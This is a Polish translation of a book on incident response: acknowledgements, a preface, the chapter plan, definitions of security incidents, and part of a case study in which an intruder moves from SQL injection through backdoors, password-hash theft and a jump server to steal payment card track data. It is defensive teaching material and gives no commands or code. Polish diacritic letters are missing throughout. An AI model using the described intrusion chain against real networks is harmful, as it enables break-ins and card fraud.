Jamie, dzikujemy za napisanie wstpu. Jerry, dziki za podsunicie pomysu, aby to Jamie
napisa wstp.
Mielimy najlepszego moliwego redaktora merytorycznego, Curtisa Rosea. Jego wiedza,
oko do szczegw i bezstronne komentarze przyczyniy si do znacznego polepszenia jakoci tej
ksiki. Dzikujemy, Curt.
W kocu chcielibymy podzikowa wszystkim pracownikom wydawnictwa McGraw-Hill
Education, m.in. Brandi Shailer, Amandzie Russell i Amy Jollymore za wsparcie i cierpliwo.
Wprowadzenie
W
padzierniku 2013 roku Instytut Ponemon opublikowa wyniki bada dotyczcych
kosztw ponoszonych przez rne organizacje z powodu cyberprzestpstw. redni czas
rozwizania problemu z bezpieczestwem wrd badanych instytucji wynosi 32 dni,
a redni koszt wszystkich zwizanych z tym operacji to nieco ponad milion dolarw. W poprzednim
roku redni czas operacji wynosi 24 dni, a rednie koszty byy rzdu 600 000 dolarw. Jednak
koszty ponoszone przez organizacj dotknit atakiem to nie wszystko, bo szkody, jakich narobi
przestpcy przy uyciu wykradzionych informacji, s bardzo trudne do oszacowania i mona je
okreli dopiero po jakim czasie lub mog nigdy nie zosta odkryte.
Tworzy si przepisy prawne i rne regulacje przemysowe majce na celu zwikszenie
bezpieczestwa komputerowego, za nieprzestrzeganie ktrych gro surowe kary. Dziaania te
mog by w pewnym stopniu pomocne, ale jednoczenie zamieniaj bezpieczestwo komputerowe
w pole do odhaczenia na licie zada. W efekcie organizacje robi tylko to, co musz, aby postawi
haczyk w odpowiednim kwadraciku. Natomiast poprawa bezpieczestwa komputerowego wymaga
wyposaenia obrocw w najbardziej efektywne narzdzia, techniki i wiedz. I to wanie
prbujemy zrobi za pomoc tej ksiki. W nowym wydaniu staramy si przekaza ca wiedz,
jak zdobylimy przez ostatnich dziesi lat. Mamy nadziej, e w tej ksice znajduje si wiele
cennych informacji.
ADRESACI KSIKI
Tematyka ksiki jest interesujca dla wszystkich osb, ktre zajmuj si procesami reagowania
na incydenty bezpieczestwa, a wic powinien j przeczyta kady, od dyrektora dziau informatyki,
przez pracownikw zespow reagowania na incydenty, po pracownikw pobierajcych dzienniki
z serwera sieciowego. Opisujemy zarwno techniczne, jak i inne aspekty dziaa. Aktualnie powodzenie
operacji wymaga zaangaowania nie tylko informatykw i specjalistw zabezpiecze, ale i przedstawicieli
dziaw prawnego, HR, PR, marketingu i innych.
Ksika ta zawiera cenne informacje dla kadego, kto chce:
pozna proces reagowania na incydenty bezpieczestwa,
stworzy i odpowiednio wyposay zesp ds. reagowania na incydenty bezpieczestwa,
rozszerzy infrastruktur lub organizacj o moliwo wykonywania procesw zwizanych
z reagowaniem na incydenty bezpieczestwa,
prowadzi dochodzenia i wdraa rozwizania,
nauczy si gromadzenia materiau dowodowego,
nauczy si analizy dowodw z systemw operacyjnych Windows i OS X,
segregowa zoliwe oprogramowanie,
pisa lepsze raporty.
ORGANIZACJA KSIKI
Ksik podzielilimy na sze czci, zaczynajc od tematw wstpnych, na metodach
rozwizywania problemw z incydentami bezpieczestwa koczc. Opisujemy w niej pojcia
dotyczce incydentw, techniki gromadzenia danych oraz metody analityczne. Zawsze staralimy
si podsuwa takie rozwizania, ktre powinny sprawdza si take w przyszoci. Nie tylko
opisujemy kwestie zwizane z reagowaniem na incydenty, ale rwnie przedstawiamy zagadnienia
fundamentalne, aby mona byo podejmowa jak najlepsze decyzje take wtedy, gdy zmieni si
warunki. Podstawowe zagadnienia nie powinny bardzo zmieni si w czasie i dlatego mamy
nadziej, e to wydanie ksiki bdzie przydatne przez wiele lat.
Cz I. Przygotowywanie si na nieuniknione
W tej czci staramy si przedstawi problematyk narusze bezpieczestwa systemw informatycznych
z szerokiej perspektywy oraz podpowiadamy, jak skompletowa zesp fachowcw, ktrzy w razie
wystpienia incydentu bd wiedzieli, co maj robi. Najpierw przytaczamy dwa prawdziwe przykady
zaczerpnite z wasnego dowiadczenia. Nastpnie omawiamy kwestie dotyczce prowadzenia
dziaa zwizanych z reakcj na incydent bezpieczestwa, a wic np. definiujemy, czym jest proces
reakcji na incydent, etapy dochodzenia, metody oddalania zagroenia, techniki ledzenia informacji,
oraz podpowiadamy, co jest potrzebne do stworzenia skutecznego zespou specjalistw. Na koniec
opisujemy, jak przygotowa infrastruktur, organizacj i zesp reagowania na incydenty.
BD! W DOKUMENCIE NIE MA TEKSTU O PODANYM STYLU. WPROWADZENIE 21
Cz II. Wykrywanie incydentw i ich charakterystyka

Dziaania, jakie trzeba podj w chwili wykrycia incydentu, maj powane konsekwencje dla
wyniku dochodzenia. W czci II podpowiadamy, co naley zrobi, aby skutecznie odpowiedzie
na incydent. Opisujemy listy czynnoci do wykonania, metody sporzdzania dokumentacji sprawy,
techniki zdobywania tropw, sposoby tworzenia wskanikw naruszenia systemu oraz techniki
okrelania zasigu incydentu.
Cz III. Gromadzenie danych

Kade ledztwo wymaga zgromadzenia i zapisania pewnych informacji. W tej czci ksiki
opisujemy metody zbierania danych zarwno z dziaajcych, jak i wyczonych systemw, sieci
oraz usug dla przedsibiorstw. rda danych to m.in. pami, dyski twarde, przechwycone
pakiety sieciowe i dzienniki.
Cz IV. Analiza danych

Nastpnym krokiem po zgromadzeniu danych jest ich analiza. W tej czci przedstawiamy oglne
techniki analizy danych, a nastpnie przechodzimy do szczegowych zagadnie dotyczcych
konkretnych systemw operacyjnych Microsoft Windows i Apple OS X. Napisalimy te
rozdzia o identyfikacji zoliwego oprogramowania (ang. malware triage), w ktrym skupilimy si
gwnie na platformie Windows. Na koniec omawiamy metody pisania raportw i przedstawiamy
przykadowy raport.
Cz V. Naprawa
Naprawa to ostateczny cel wszystkich czynnoci zwizanych z reakcj na incydent bezpieczestwa.
Chodzi o przywrcenie organizacji do normalnego stanu. W czci tej opisujemy rne koncepcje,
m.in. siedmioetapowy proces naprawy. Nastpnie omawiamy studium przypadku, w ktrym
pokazujemy, jak praktycznie wykorzysta przedstawione metody w prawdziwych sytuacjach
opisanych w rozdziale pierwszym.
Cze VI. Dodatki

Na kocu kadego rozdziau tej ksiki zamiecilimy kilka pyta pomocnych w utrwaleniu
wiadomoci i przewiczeniu nowo nabytych umiejtnoci. W dodatku A znajduj si odpowiedzi
na te pytania. W dodatku B zamiecilimy formularze i listy kontrolne, do ktrych odnosimy si
w rnych czciach ksiki. Dodatkw nie ma w wydrukowanym wydaniu ksiki, ale mona je znale
na stronie internetowej wydawnictwa Helion, pod adresem ftp://ftp.helion.pl/przyklady/incbez.zip.
RDA
Jako e technologia i strony internetowe cigle si zmieniaj, stworzylimy internetowe rdo
informacji, w ktrym znajdziesz aktualne wersje odnonikw z tej ksiki. Strona ta znajduje si
pod adresem ir3e.com i oprcz aktualizacji odnonikw zawiera take rne inne zasoby.
Komentarze i sugestie mona wysya na adres e-mail authors@ir3e.com.
CZ I
Przygotowywanie si
na nieuniknione
ROZDZIA 1.
Prawdziwe incydenty
O
d drugiego wydania tej ksiki, ktre ukazao si dziesi lat temu, wiat cyberprzestpczoci
znacznie si zmieni. Zmianom ulegy nie tylko metody i narzdzia dokonywania przestpstw,
ale i systemy oraz aplikacje, ktre s poddawane atakom. Wraz z metodami i celami
przestpstw zmieniy si rwnie sposoby obrony i reakcji na ataki. Niektrzy ignoruj zdarzenia
i akceptuj ryzyko lub wkalkulowuj koszt cyberatakw w koszty prowadzenia dziaalnoci. Inni
wydaj due sumy pienidzy na rozwizania, ktre ich zdaniem powinny wszystko zaatwi,
i niewiele uwagi powicaj szczegom. W kocu s te tacy, ktrzy wini rzd za to, e ich
odpowiednio nie chroni. Popularyzator nauki Carl Sagan powiedziaby, gdyby y: im bardziej
oczekujemy, e problem rozwie za nas kto inny, tym mniejsze mamy szanse, e rozwiemy go
we wasnym zakresie. W naszym zamierzeniu ksika ta powinna spowodowa, e staniesz si
aktywn stron w rozwizywaniu problemu.
Aby skorzysta z wiedzy tu zawartej, musisz wiedzie, co to jest incydent bezpieczestwa, na
czym polega reakcja na taki incydent, jaki jest aktualny stan wiedzy oraz dlaczego w ogle naley si
tym przejmowa. Wszystkie te zagadnienia opisujemy w tym rozdziale; dodatkowo przedstawiamy
dwa powizane z nimi studia przypadku.
CO TO JEST INCYDENT BEZPIECZESTWA

Centrum Computer Security Resource Center (CSRC) przy amerykaskim Narodowym Instytucie
Standaryzacji i Technologii (ang. National Institute of Standards and Technology NIST) definiuje
zdarzenia i incydenty w specjalnej publikacji 800-61, Computer Security Incident Handling Guide.
W dokumencie tym zdarzenie jest zdefiniowane jako kade dajce si zaobserwowa wydarzenie
w systemie lub sieci, natomiast incydent wg tego dokumentu to naruszenie lub groba naruszenia
zasad bezpieczestwa komputerowego, akceptowalnych zasad uytkowania lub standardowych
praktyk zapewniania bezpieczestwa.
W INTERNECIE
http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
Wiele agencji rzdowych i organizacji partnerskich, wielu kontrahentw i sporo firm

obsugujcych utrzymuje dziay IT bazujce w swojej dziaalnoci wewntrznej na wytycznych
NIST. Cho warto zna przytoczone definicje najwaniejszych poj, bez wzgldu na to, czy maj
one zastosowanie do Twojej organizacji, czy nie, dla nas s zbyt lakoniczne i nie oddaj caej
technicznej zoonoci problemu.
W drugim wydaniu tej ksiki zdefiniowalimy incydent bezpieczestwa komputerowego jako
bezprawne, nieautoryzowane lub nieakceptowalne dziaanie w systemie komputerowym lub sieci
komputerowej. Nastpnie przedstawilimy kilka przykadw, takich jak m.in. kradzie tajemnic
handlowych, spam e-mail, nieuprawnione lub bezprawne wtargnicia do systemw komputerowych
oraz defraudacja. Definicja ta nadal jest dobra, cho brana znacznie si zmienia, zatem zmieni si
te musi sposb definiowania incydentu. Dlatego teraz postanowilimy przeformuowa nasz
ROZDZIA 1. PRAWDZIWE INCYDENTY 27
definicj nastpujco: kade bezprawne, nieautoryzowane lub nieakceptowalne dziaanie w systemie

komputerowym, telefonie komrkowym, tablecie i kadym innym urzdzeniu elektronicznym
z systemem operacyjnym podczonym do sieci komputerowej. Rozszerzenie tej definicji byo
konieczne ze wzgldu na to, e dzi wszystko jest wzajemnie powizane. Samochody, telewizory,
konsole do gier, a nawet lodwki i tostery mog czy si z internetem. A skoro tak, to wszystkie
te urzdzenia s potencjalnym celem ataku cyberprzestpcw.
Uwaga Naley pamita, e kada organizacja moe ustali wasn definicj incydentu bezpieczestwa.
Wyrnia si rne warstwy incydentw, w zalenoci od ktrych podejmuje si rnorodne rodki
zaradcze. Posiadanie definicji incydentu i opracowanych procedur postpowania w przypadku jego
wystpienia jest znakiem tego, e firma powanie podchodzi do kwestii bezpieczestwa. Zalecamy,
aby podczas opracowywania definicji incydentu przeanalizowa obowizujce przepisy prawne
definiujce przestpstwa komputerowe. W USA definicj przestpstwa komputerowego podano
w dziale 18. Kodeksu Stanw Zjednoczonych, w paragrafie 1030. Innym dobrym rdem informacji
jest podrcznik Ministerstwa Sprawiedliwoci USA zatytuowany Prosecuting Computer Crimes
(ciganie przestpstw komputerowych).
W INTERNECIE
www.law.cornell.edu/uscode/text/18/1030
www.justice.gov/criminal/cybercrime/docs/ccmanual.pdf
CO TO JEST REAKCJA NA INCYDENT

Reakcja na incydent to skoordynowana i dobrze zorganizowana akcja przeprowadzana od chwili wykrycia
incydentu do rozwizania problemu. W procesie tym mog by wykonywane nastpujce czynnoci:
sprawdzenie, czy rzeczywicie doszo do incydentu bezpieczestwa;
szybkie wykrycie naruszenia systemu i ograniczenie szkd;
okrelenie i opisanie zasigu incydentu;
zapobieenie nieskoordynowanej i niespjnej akcji;
okrelenie i zapewnienie prawdziwych informacji;
minimalizowanie negatywnego wpywu na dziaalno firmy i dziaanie sieci;
minimalizowanie szkd w zaatakowanej organizacji;
przywrcenie normalnego toku pracy;
odpowiednie podanie informacji do wiadomoci publicznej;
przedsiwzicie prawnych lub cywilnych krokw przeciwko sprawcom;
szkolenie pracownikw stopnia kierowniczego;
wzmocnienie zabezpiecze zaatakowanej jednostki, aby uchroni j przed kolejnymi
incydentami.
To, jakie czynnoci zostan podjte i kto wejdzie w skad zespou reagujcego na incydent,
zaley od celw, jakie powzito. Cele natomiast zale od takich czynnikw jak powaga incydentu,
potrzeby ofiary, metody reagowania na incydenty stosowane przez ofiar, czas incydentu, intencje
przestpcw, ktrzy zaatakowali (jeli s znani), dotknite brane lub klienci oraz pomoc ze strony
decydentw. Generalnie reakcja na incydent polega na stworzeniu zespou sprawdzajcego, co si
stao, i oceniajcego zakres szkd, a take zespou naprawczego, ktry pozbdzie si intruza
i wzmocni zabezpieczenia organizacji bdcej ofiar ataku, oraz wyznaczeniu kogo do kontaktu
(z kierownikami wyszego szczebla, pracownikami wewntrznymi, partnerami biznesowymi
i opini publiczn).
AKTUALNY STAN WIEDZY

Ataki komputerowe, jakie teraz obserwujemy, s skomplikowane bardziej ni kiedykolwiek
wczeniej. Jak wykaemy w dwch studiach przypadku opisanych dalej w tym rozdziale, ataki
na rodowiska korporacyjne nie obejmuj ju tak jak kiedy tylko kilku systemw. Obecnie
incydenty bezpieczestwa komputerowego dotykaj setek systemw, ktre fizycznie mog by
zlokalizowane w kadym miejscu na wiecie niektre ataki mog nawet nie by nakierowane
na dan organizacj, a s tylko punktami przeskoku wykorzystywanymi do maskowania lokalizacji
hakera. Cyberprzestpcy stosuj zaawansowane technologicznie metody naruszania konfiguracji
sieci, aby narobi szkd w atakowanych firmach. Oprcz tego wamuj si do urzdze sieciowych
i modyfikuj listy kontroli dostpu (ang. access control list ACL), aby uzyska dostp do
chronionych obszarw. Bardziej zaawansowani przestpcy wykorzystuj zoliwe oprogramowanie
umoliwiajce pogorszenie stanu zabezpiecze systemowych. Kodu takiego nie mona ju
traktowa jak programu spreparowanego specjalnie dla okrelonego systemu operacyjnego,
poniewa najczciej jest pisany w jednym z uniwersalnych jzykw programowania, takim
jak Java, i automatycznie wykrywa system operacyjny, a nastpnie wprowadza odpowiednie
procedury. Twrcy zoliwego oprogramowania coraz wicej czasu powicaj na rozwijanie
metod maskujcych; dzieje si tak zwaszcza wtedy, kiedy chc wykonywa kod tylko w pamici
i ukrywa si w rodowiskach wirtualnych, aby uniemoliwi wykrycie ich programw za pomoc
technik ledczych i analizy antywirusowej. Ponadto zaawansowani hakerzy znaj wiele technik
stosowanych do ledzenia ich przestpczej dziaalnoci i dlatego stosuj taktyk polegajc
na skrywaniu swoich dziaa wrd uprawnionych operacji systemowych i sieciowych.
To znacznie utrudnia prac oraz podnosi koszty i wydua czas trwania kompletnej akcji
skierowanej na incydent.
Narzdzia, metody i dyscypliny wykorzystywane do reagowania na incydenty zmieniaj si,
podobnie jak typy samych incydentw. Zespoy reagujce musz pracowa jeszcze szybciej, aby
osign zamierzone cele. Musz te pracowa w wikszej liczbie systemw, przez co skalowalno,
automatyzacja i rnorodno platform narzdzi ledczych jest duo waniejsza ni wczeniej.
Wszystko zmierza w kierunku tworzenia narzdzi umoliwiajcych ledczym opisywanie typu
poszukiwanej wrogiej aktywnoci, a nastpnie szukanie jej we wszystkich systemach w rodowisku,
a nie tylko w jednym na raz. Te same narzdzia zapewniaj funkcje automatyzacji, takie jak m.in.
haszowanie plikw zaadowanych do pamici, moliwo weryfikowania certyfikatw cyfrowych

oraz funkcje gromadzenia danych dotyczcych mechanizmw zapisywania informacji
wykorzystywanych przez zoliwe oprogramowanie. Nowoczesne rodowiska komputerowe za nic
maj granice geograficzne, przez co narzdzia ledcze musz dziaa niezalenie od lokalizacji.
Oznacza to konieczno wykonywania wikszoci dziaa zdalnie z uwzgldnieniem wolnych
i zawodnych pocze sieciowych. W kocu narzdzia ledcze musz umoliwia analitykowi
prowadzenie szybkich i dogbnych bada. Tego typu analizy czsto okrela si mianem akcji na
ywo (ang. live response). Akcja na ywo to to samo, co analiza ledcza, tylko e przeprowadzana
na dziaajcym systemie, a nie wczeniej wykonanym obrazie.
Innym powodem zmiany narzdzi, metod i dyscyplin wykorzystywanych do reagowania
na incydenty jest zmiana typu systemw i aplikacji, ktre trzeba bada. Systemy komputerowe
dysponuj coraz wiksz pojemnoci danych, zatem wykonywanie bitowych obrazw
podejrzanych systemw przy duym incydencie jest czasochonne i w najlepszym przypadku
trudne. Organizacje rejestruj coraz wicej danych, a zespoy reagujce na incydenty musz radzi
sobie z normalizowaniem, parsowaniem i pojmowaniem duych iloci danych. Aplikacje te s
coraz bardziej zoone, co sprawia, e konieczna jest wsppraca z ekspertami z rnych dziedzin,
aby nie przeoczy czego wanego. W kocu reakcja na incydent wymaga zaangaowania nie
tylko dziaw IT i bezpieczestwa. Aby dziaania byy skuteczne, musz si w nie wczy
przedstawiciele rnych dyscyplin, m.in. prawnicy, PR-owcy, finansici, marketingowcy oraz
pracownicy dziaw HR.
W istocie zaangaowanie prawnikw i PR-owcw w dziaania zwizane z reagowaniem
na incydenty powoduje, e powstaj cakiem nowe rodzaje wyzwa. Wiele organizacji bardzo
powanie traktuje poufno, integralno i dostpno (ang. confidentiality, integrity, availability
CIA) chc one kontynuowa swoj dziaalno, jednoczenie minimalizujc ryzyko dalszego
rozprzestrzeniania si problemu. Gdy prawnicy i PR-owcy wczaj si do akcji, czciej dochodzi
do szybkiego odczenia podejrzanych lub zainfekowanych komputerw od sieci i ich przebudowania
lub wyczyszczenia. Cho jest to zrozumiae i czasami uzasadnione, stanowi problem dla zespow
reagujcych na incydenty. Co jest najlepszym sposobem na zapewnienie poufnoci, integralnoci
i dostpnoci przy jednoczesnym zachowaniu dowodw i tropw, ktre mog by jedyn nadziej
na wykrycie sprawcw i ewentualnie innych ofiar? Dla zachowania ulotnych danych najwaniejsze
s szybka reakcja i uycie efektywnych narzdzi.
Uwaga Wiele z opisywanych w tej ksice koncepcji moe wydawa si sprzecznych z powszechnie
stosowanymi rozwizaniami. Trzeba jednak pamita, e najnowsze osignicia nauki i techniki
sprawiaj, i stare mdroci ludowe przestaj mie jakiekolwiek znaczenie. Wemy np. przyjt
niedawno zasad, e osob z atakiem serca naley schodzi. Co ciekawe, Hipokrates odkry t
technik ju ponad dwa tysice lat temu. Cho moe si to wydawa bezsensowne i niebezpieczne,
nauka i dowiadczenia wskazuj wyranie, e metoda ta pozwala znacznie efektywniej ratowa
ycie. Podobnie sprawa wyglda w przypadku metod opisywanych w tej ksice. W pierwszej
chwili mog wydawa si niemdre, ale z naszych dowiadcze wynika, e s skuteczne.
DLACZEGO POWINIENE
INTERESOWA SI KWESTIAMI REAKCJI
NA INCYDENTY BEZPIECZESTWA
Prawie codziennie odbieramy telefony od przedstawicieli rnych firm, ktre pady ofiar
cyberataku. Problem ten dotyczy wszystkich bran dziaalnoci gospodarczej, od kancelarii
prawniczych po firmy z sektora finansowego, od duych producentw, handlowcw detalicznych,
przedstawicieli wojskowoci po sklepy z pizz, firmy telekomunikacyjne, placwki suby zdrowia,
firmy z brany kosmicznej i satelitarnej, producentw rozwiza kryptograficznych i firmy
telekomunikacyjne, agencje rzdowe, kopalnie, firmy programistyczne itd. Bylimy wiadkami
zagroe firm z kadej z tych bran i widzielimy, jak zakres ataku rozprzestrzenia si, obejmujc
sektor prywatny, publiczny, korporacje i nawet zwykych obywateli w ich domach. Nie ma
wtpliwoci, e na naszych oczach odbywa si najwiksza w historii nielegalna wymiana
informacji i nie ma powodu sdzi, e zjawisko cyberszpiegostwa zacznie zanika.
Przestpcy ryzykuj niewiele i gro im niezbyt surowe kary za wamania do systemw
w celu dokonywania oszustw zakupowych, wykradania informacji osobistych oraz czerpania
korzyci ze skradzionych danych kart kredytowych lub kont bankowych. Zbrojne konflikty
na tle ideologicznym tocz si take na polu cybernetycznym. Rosnca fala bezprawnych lub
nieautoryzowanych wtargni wymaga zachowania cigej czujnoci i nieprzerwanego stosowania
si do porad zawartych w tej ksice. Pamitaj, e incydenty bezpieczestwa moe s nieuniknione,
ale dziki naszym dowiadczeniom bdziesz mg zminimalizowa spowodowane przez nie szkody.
Reagowanie na przypadki zamania zabezpiecze jest wymagane przez agencje rzdowe i firmy
prywatne, a jest to zajcie zarwno fascynujce, jak i trudne. W istocie naruszenia bezpieczestwa
s dzi tak powszechne, e dowiadczeni specjalici zajmujcy si reagowaniem na incydenty s
bardzo poszukiwani i mog liczy na ciekaw ciek rozwoju.
To wszystko moe wydawa si przytaczajce, ale mamy nadziej, e rozbudzilimy w Tobie
ciekawo i ju nie moesz si doczeka przeczytania reszty tej ksiki! Naszym celem jest wyposaenie
Ciebie, nasz Czytelniku, w narzdzia i techniki, ktre opracowalimy w ogromnych blach,
a nastpnie doszlifowywalimy przez dziesi ostatnich lat na podstawie setek wielkoskalowych,
midzynarodowych, skomplikowanych i publicznych przypadkw.
STUDIA PRZYPADKU
W tej czci rozdziau prezentujemy dwa studia przypadku; poznajc je, zdobdziesz oglny obraz
tego, z czym mierzymy si w naszej pracy. Pierwszy przypadek dotyczy kradziey danych kart
bankowych z duej organizacji finansowej. Do danych kart bankowych zaliczamy karty kredytowe
i debetowe oraz informacje o powizanych z nimi kontach. Bohaterem drugiej opowieci jest firma
technologiczna, w ktrej haker za pomoc zoliwego oprogramowania najpierw wkrad si do systemu,
a potem wycofa i wykorzystywa wirtualn sie prywatn (VPN) do wykradania poufnych danych.
Wybralimy te dwa przypadki ze wzgldu na wysoki stopie zoonoci zarwno ataku, jak i metod
jego odparcia. Warto uczy si na podstawie wasnego dowiadczenia i dlatego mamy nadziej,
e opisy te bd pouczajce. Oczywicie zmienilimy fakty, aby nie zdradzi tosamoci ofiar,
poniewa jak ju wspomnielimy opisujemy tu prawdziwe zdarzenia.
Studium przypadku 1. Gdzie s pienidze

Na pocztku stycznia haker rcznie wykorzysta luk w zabezpieczeniach pozwalajc na wstrzyknicie
do systemu zoliwego kodu SQL. Miao to miejsce na serwerze sieciowym o nazwie WEB1. Serwer
ten znajdowa si w strefie zdemilitaryzowanej (DMZ) nalecej do maej jednostki biznesowej
zakupionej przez zaatakowan organizacj cztery lata wczeniej. Jednostka ta miaa pen czno
z reszt rodowiska organizacji. Haker, stosujc atak typu SQL injection na serwer WEB1, wykona
polecenia w systemie baz danych o nazwie DB1. Wszystkie polecenia byy wykonywane z uprawnieniami
usugi serwera SQL Server. W tym przypadku usuga SQL dziaaa z uprawnieniami administratora
lokalnego. Haker wykorzystywa rozszerzon procedur skadowan xp_cmdshell do wykonywania
dowolnych polece oraz pobierania i wykonywania zoliwego kodu w DB1. Wada konfiguracji
strefy DMZ w zaporze umoliwia hakerowi wykonywanie polece SQL z serwera DB1 na serwerze
baz danych o nazwie intDB1 zlokalizowanym w rodowisku korporacyjnym. Na poniszym rysunku
przedstawiamy to rodowisko i cay proces.
Po przejciu do rodowiska korporacyjnego intruz przez kilka tygodni prowadzi szeroko

zakrojone czynnoci rozpoznawcze. Najpierw dziaa za pomoc polece wykonywanych przez
SQL injection. Tydzie po uzyskaniu dostpu do rodowiska wewntrznego haker zainstalowa
tylne drzwi (ang. backdoor), ktre day mu dostp do rodowiska korporacyjnego bez posugiwania
si technik SQL injection. Wwczas przestpca pobra i zama skrt hasa lokalnego konta
administratora systemu intDB1. W ten sposb uzyska uprawnienia administratora do wikszoci
systemw w rodowisku. Atakujcy, oprcz wykonania czynnoci rozpoznawczych, zainstalowa
te rejestrator naciskanych klawiszy i pobra skrty hase z wielu systemw nalecych do
administratorw. Jednym z tych systemw by kontroler domeny zawierajcy hasa wszystkich
uytkownikw tej domeny.
Do poowy lutego haker zaszczepi w rodowisku ponad dwadziecia tylnych drzwi z trzech
rnych rodzin. Pierwsz rodzin bdziemy dalej nazywa BKDOOR. Oprogramowanie to byo
czci samodzielnie opracowanego narzdzia do tworzenia zoliwego oprogramowania, ktre
umoliwiao modyfikowanie plikw binarnych na tyle, e nie byy wykrywane przez programy
antywirusowe. Wiadomo, e z programu tego korzystao take wielu innych hakerw.
Dawa on hakerowi pen kontrol nad systemem ofiary oraz funkcjami wysyania i pobierania
plikw, moliwo tunelowania ruchu, np. przy uyciu protokou RDP (ang. Remote Desktop
Protocol) do rodowiska, oraz umoliwia przekazywanie ruchu sieciowego midzy tylnymi
drzwiami. Oprogramowanie BKDOOR szyfrowao swoje polecenia (C2) algorytmem RC4.
Okreleniem dane C2 oznaczamy instrukcje wysyane przez hakera do wirusa, odpowiedzi na te
instrukcje i zwizane z nimi protokoy. Serwer C2, do jakiego odnosimy si dalej w tym rozdziale,
to serwer, ktry najczciej znajduje si poza rodowiskiem ofiary i jest kontrolowany przez
atakujcego oraz suy mu do przesyania danych C2 do i z wirusa. Program BKDOOR zapisywa
informacje przy uyciu techniki zwanej przechwytywaniem kolejnoci szukania bibliotek DLL
(ang. DLL search order hijacking). Wicej informacji na jej temat mona znale na podanych
niej stronach internetowych.
W INTERNECIE
msdn.microsoft.com/en-us/library/ms682586(VS.85).aspx
www.mandiant.com/blog/dll-search-order-hijacking-revisited
Drugi rodzaj zoliwego oprogramowania nazwiemy PROXY, poniewa przekazywao ono

poczenia do okrelonej lokalizacji. Oprogramowanie to mogo skierowa poczenia na adres
okrelony w pliku konfiguracyjnym lub akceptowao oryginalny adres docelowy z oprogramowania
BKDOOR. Trzeci typ zoliwego oprogramowania nazywa si BKDNS, poniewa tunelowa cay
ruch C2 przez zapytania i odpowiedzi DNS. Oprogramowanie typu BKDNS suyo prawdopodobnie
tylko jako wyjcie awaryjne, poniewa podczas trwania ledztwa haker go nie uywa. By to bardzo
ciekawy element arsenau hakera, ktry wszczepia jego rne wersje zarwno w systemach Windows,
jak i Linux. Cho w kadym z tych systemw oprogramowanie to miao troch inn struktur,
zakres funkcjonalnoci w obu przypadkach by taki sam.
Midzy pocztkiem stycznia a kocem marca haker wielokrotnie krad dane. Najpierw za cel
obra nazwy uytkownikw i hasa, a nastpnie zabra si za architektur sieci i inne informacje
dotyczce IT. Podczas przegldania plikw i folderw w komputerach administratorw systemu
udao mu si odkry miejsce przechowywania poufnej dokumentacji. Przykadowo intruz
przeprowadzi rekonesans w katalogach, w udziale o nazwie IT. W kocu przestpca skierowa
swoj uwag na informacje o systemach finansowych i sposobach obsugi danych finansowych
w organizacji. Odkry miejsce przechowywania poufnych danych tego typu: sporzdzi listy
wszystkich udziaw plikowych dostpnych w sieci i rcznie sprawdzi najbardziej obiecujce.
Ponadto haker ustanowi poczenia RDP z systemami nalecymi do uytkownikw w docelowych
obszarach finansowych i logowa si w rnych aplikacjach finansowych za pomoc wczeniej
skradzionych danych powiadczajcych. W ten sposb pozna zasad dziaania aplikacji finansowych
i dowiedzia si, jak kra przechowywane przez nie dane.
Po znalezieniu interesujcych go informacji haker ukrad je za pomoc dwch metod. Pierwsza
polegaa na ustanowieniu wychodzcego poczenia FTP z kontrolowanym systemem i wysyaniu
danych do serwera FTP. Drugi sposb polega na przesyaniu przez jedne z tylnych drzwi danych
ze rodowiska do serwera C2 tylnych drzwi. Zaawansowani hakerzy nie wykorzystuj tej techniki,
poniewa nietypowo duy transfer danych wzbudza podejrzenia. W prawie kadym przypadku
dane byy kompresowane do formatw ZIP, RAR lub CAB. Tego rodzaju kompresja pozwala
zmniejszy rozmiar plikw o 50 95%.
W czerwcu haker wiedzia ju o serwerze wstpnym cile kontrolowanym systemie,
ktry jako jedyny ma dostp do poufnych zasobw wykorzystywanym przez administratorw
systemowych do wchodzenia do chronionej czci sieci, w ktrej przechowywane byy wszystkie
poufne informacje finansowe. W tym przypadku haker wykry istnienie serwera wstpnego
(JMPSRV) przy uyciu monitorowania pocze RDP nawizywanych przez jednego konkretnego
administratora systemu i przegldania zapisu naciskanych przez niego klawiszy.
Na poniszym rysunku ilustrujemy drog, jak przeby haker, aby doj do chronionego
rodowiska finansowego.
W tym przypadku hakera interesoway informacje dotyczce kart kredytowych i debetowych,

zwanych rwnie kartami patniczymi, lub dane posiadaczy kart. Znajdujcy si z tyu karty
kredytowej i debetowej magnetyczny pasek zawiera dwa rodzaje informacji: ciek 1. i ciek 2.
Generalnie cieka 1. zawiera wszystko, co jest potrzebne do podrobienia karty w sposb
umoliwiajcy posugiwanie si ni w zwykych sklepach, przy uyciu tzw. transakcji z kart.
Natomiast cieka 2. zawiera informacje potrzebne do uywania karty w internecie, w tzw.
transakcjach bez uycia karty. Wprawdzie dane ze cieki 2. nie zawieraj wartoci CVV/CVV2
wytoczonych na karcie, ale niektre sklepy nie wymagaj ich podania podczas robienia zakupw
w internecie. Opisywana instytucja finansowa zapisywaa dane ze cieki 2. w swoim chronionym
rodowisku, gdy karta zostaa przecignita przez czytnik w sklepie. Przestpcy wykorzystywali
te dane podczas zakupw w internecie lub sprzedawali je na czarnym rynku. Dalej informacje
ze cieki 2. karty debetowej i kredytowej bdziemy nazywa danymi posiadacza karty.
Haker za pomoc programu BKDOOR ustanowi poczenie RDP z JMPSRV przy uyciu konta
administratora DOMAIN\admin. Niestety wymagane byo tylko pojedyncze uwierzytelnianie
z konta administratora domeny na serwerze wstpnym, a przestpca ju wczeniej wama si
do wielu kont administratorw domeny. Po uwierzytelnieniu si w JMPSRV haker przesa narzdzia

rozpoznawcze do systemu i rozpocz jego badanie w chronionym rodowisku finansowym.
Wczy narzdzie do wydobywania skrtw hase z pamici na JMPSRV, poniewa w rodowisku
finansowym byy potrzebne inne dane powiadczajce ni te, ktre ju posiada. Zainstalowany
program pozwoli zdoby skrt hasa do lokalnego konta administratora wykorzystywanego
w chronionym rodowisku finansowym.
Przez nastpne dwa miesice haker prowadzi rekonesans rodowiska finansowego,
koncentrujc si na nastpujcych aspektach:
systemach przetwarzajcych lub przechowujcych informacje posiadaczy kart,
systemach majcych bezporednie poczenie z internetem.
Poprzez utworzenie listy dostpnych udziaw sieciowych, przejrzenie danych znajdujcych si
w wytypowanych katalogach oraz wykradzenie dokumentacji chronionego rodowiska finansowego
hakerowi udao si wykry systemy zaangaowane w przetwarzanie i przechowywanie danych
